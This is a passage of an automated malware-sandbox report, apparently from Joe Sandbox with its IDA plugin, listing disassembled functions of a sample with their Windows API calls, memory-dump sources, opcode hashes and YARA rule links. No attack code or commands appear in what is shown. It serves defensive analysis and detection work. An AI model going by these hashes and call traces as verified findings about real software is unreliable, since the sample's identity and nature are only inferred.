                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2643169976-0
                                                                                                    • Opcode ID: 2709cf1331fa934cd3962604e534564f5921acfc52d1cdbdadc759ac776f32d6
                                                                                                    • Instruction ID: 276ca05c81328b0d8fa98369a628458d2f0afdfaf2f3664941241155155ded69
                                                                                                    • Opcode Fuzzy Hash: 2709cf1331fa934cd3962604e534564f5921acfc52d1cdbdadc759ac776f32d6
                                                                                                    • Instruction Fuzzy Hash: 21E06D316402096BDB115B61EC45FD9379CAB183C6F484031B944E20A0EB61DAC89A50
                                                                                                    Function 00E1AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00E32641,000000FF), ref: 00E1ACB0
                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00E32641,000000FF), ref: 00E1ACB5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 3856339756-0
                                                                                                    • Opcode ID: 32d70ae944bb0f0c1685f842516ae7c76fd74a174c3c7c3c0c9e211ee48b895a
                                                                                                    • Instruction ID: 3982b89dc56c314098a19bd4f49bd96cc01d836f36ae932f396b9d3b11ae4455
                                                                                                    • Opcode Fuzzy Hash: 32d70ae944bb0f0c1685f842516ae7c76fd74a174c3c7c3c0c9e211ee48b895a
                                                                                                    • Instruction Fuzzy Hash: 4EE06572604650EFC7109B59DC06F4AFBA8FB49F20F004269F416E3760CB746841CA90
                                                                                                    Function 00E0A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00E0A23A,?,00E0755C,?,?,?,?), ref: 00E0A254
                                                                                                      • Part of subcall function 00E0BB03: _wcslen.LIBCMT ref: 00E0BB27
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00E0A23A,?,00E0755C,?,?,?,?), ref: 00E0A280
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2673547680-0
                                                                                                    • Opcode ID: 34ca2239e02e5f03bd324222d32fe169c1ad95cfb879713779ad0a442c5d0e24
                                                                                                    • Instruction ID: 1b2e8de6a5cbd1779acc5b71dd10ff06ff1078132d3257c953c47facab3241c0
                                                                                                    • Opcode Fuzzy Hash: 34ca2239e02e5f03bd324222d32fe169c1ad95cfb879713779ad0a442c5d0e24
                                                                                                    • Instruction Fuzzy Hash: BFE092315001285BDB20ABA4CC09BD9BBA8AB083E5F044271FD44F32E0D770DE88CAE0
                                                                                                    Function 00E1DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 00E1DEEC
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 00E1DF03
                                                                                                      • Part of subcall function 00E1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1B579
                                                                                                      • Part of subcall function 00E1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B58A
                                                                                                      • Part of subcall function 00E1B568: IsDialogMessageW.USER32(00010420,?), ref: 00E1B59E
                                                                                                      • Part of subcall function 00E1B568: TranslateMessage.USER32(?), ref: 00E1B5AC
                                                                                                      • Part of subcall function 00E1B568: DispatchMessageW.USER32(?), ref: 00E1B5B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 2718869927-0
                                                                                                    • Opcode ID: a4f4c531790f4e38d65f1506b477c86e44add7ee209a18999cf135075de0e5cc
                                                                                                    • Instruction ID: 9d0984247ecfdf410c6cb007e06baf1952a621bb7d723cea4a5ee78d1d329eb4
                                                                                                    • Opcode Fuzzy Hash: a4f4c531790f4e38d65f1506b477c86e44add7ee209a18999cf135075de0e5cc
                                                                                                    • Instruction Fuzzy Hash: 89E09BF55002482ADF01A761DD06FDE37AC5B05785F040852B710F61E3D975DA558661
                                                                                                    Function 00E1081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E10836
                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E0F2D8,Crypt32.dll,00000000,00E0F35C,?,?,00E0F33E,?,?,?), ref: 00E10858
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1175261203-0
                                                                                                    • Opcode ID: 96f017f2be42cec3bb83757e9342fc42ebeceaa2bf23a240366615b3bc95aae5
                                                                                                    • Instruction ID: eed4b9b6b8607a52e159622738f72eb3351a699daaa3c8eac9f152f31c2c4297
                                                                                                    • Opcode Fuzzy Hash: 96f017f2be42cec3bb83757e9342fc42ebeceaa2bf23a240366615b3bc95aae5
                                                                                                    • Instruction Fuzzy Hash: D8E012B65001586ADB11A7A59C49FDA7BACAF09391F0400657645F2144D674DAC48AA0
                                                                                                    Function 00E1A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E1A3DA
                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00E1A3E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                    • String ID:
                                                                                                    • API String ID: 1918208029-0
                                                                                                    • Opcode ID: e2f68d38fbedc12acff74430c779c6b6d32d882a8a1f929cfd43a39c5ffcd55e
                                                                                                    • Instruction ID: 42c87e4a12630839bcee528b4fe03e1f8c3ef38adf308538d2c11def68ef4fab
                                                                                                    • Opcode Fuzzy Hash: e2f68d38fbedc12acff74430c779c6b6d32d882a8a1f929cfd43a39c5ffcd55e
                                                                                                    • Instruction Fuzzy Hash: 3CE0ED71505218EBCB20DF55C545BEDBBE8EB14364F10906AA856A3341E374AE44DB91
                                                                                                    Function 00E22B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E22BAA
                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00E22BB5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                    • String ID:
                                                                                                    • API String ID: 1660781231-0
                                                                                                    • Opcode ID: 8c17c33b430ad4e7a960384e0793186e9cc957034637b2e87ffcfa88475d5647
                                                                                                    • Instruction ID: 11f473217b058279d18cc85b84124e02758a4103096604633f36aa65519d3914
                                                                                                    • Opcode Fuzzy Hash: 8c17c33b430ad4e7a960384e0793186e9cc957034637b2e87ffcfa88475d5647
                                                                                                    • Instruction Fuzzy Hash: 45D0223419833038CC242F703C0F58933C5AE41BB97A0379EFB21B58C1EE168040A421
                                                                                                    Function 00E012F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3351165006-0
                                                                                                    • Opcode ID: 217cc3ffe5bf687937fa1a3c8f0857b0a4666e15b9f7fe497009440a79314460
                                                                                                    • Instruction ID: abe53324f0b02391198250500d67c02fabc22b9d9d170fe18cef90598e297499
                                                                                                    • Opcode Fuzzy Hash: 217cc3ffe5bf687937fa1a3c8f0857b0a4666e15b9f7fe497009440a79314460
                                                                                                    • Instruction Fuzzy Hash: 4CC0123245C200BECB010BB5EC09C2BBBA8ABA7312F24C908F0A5D0061C238C114DB11
                                                                                                    Function 00E01A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 6be482de4db259b8967c8f2a13eafaa883752d9aa37ffd2e7827e133599cc623
                                                                                                    • Instruction ID: a298e65dc0a4a1ad2bf27b519aacd5bfb5cb933c68e914470a5e93b19329979e
                                                                                                    • Opcode Fuzzy Hash: 6be482de4db259b8967c8f2a13eafaa883752d9aa37ffd2e7827e133599cc623
                                                                                                    • Instruction Fuzzy Hash: 56C19F30A002549FEF19DF68C898BA97BA5AF15314F0821F9EC45BF2D6DB3199C4CB61
                                                                                                    Function 00E03BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: d7258fd1f93963dc42caa401835fe8f5f51d780493038be1e8af67e563ae0f53
                                                                                                    • Instruction ID: 0909dca6f904033d64e2ea29b252dce926b50c5310779512a8eba1844fdcf350
                                                                                                    • Opcode Fuzzy Hash: d7258fd1f93963dc42caa401835fe8f5f51d780493038be1e8af67e563ae0f53
                                                                                                    • Instruction Fuzzy Hash: E871D271500B849EDB35DB70CC95AE7F7E9AF14301F40192EE2ABA7281DA326AC4CF11
                                                                                                    Function 00E08284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E08289
                                                                                                      • Part of subcall function 00E013DC: __EH_prolog.LIBCMT ref: 00E013E1
                                                                                                      • Part of subcall function 00E0A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E0A598
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 2506663941-0
                                                                                                    • Opcode ID: 04053666bd578900454908af92eba5d09e7eef8d990be56106658cbc634a80b2
                                                                                                    • Instruction ID: 0f7f149fe8b37018ea4d1d3660424ffc95a24375791595d67ddbe4c16f9d3555
                                                                                                    • Opcode Fuzzy Hash: 04053666bd578900454908af92eba5d09e7eef8d990be56106658cbc634a80b2
                                                                                                    • Instruction Fuzzy Hash: EC41B5719446589ADB20EBA0CD55AEAB3B8AF40304F0424EAE1DAB70D3EB755FC4CF10
                                                                                                    Function 00E013E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E013E1
                                                                                                      • Part of subcall function 00E05E37: __EH_prolog.LIBCMT ref: 00E05E3C
                                                                                                      • Part of subcall function 00E0CE40: __EH_prolog.LIBCMT ref: 00E0CE45
                                                                                                      • Part of subcall function 00E0B505: __EH_prolog.LIBCMT ref: 00E0B50A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 3beecffe41e1592f88d90101d797bf4f4e5a69357da94ba08beb5e4644d75b3f
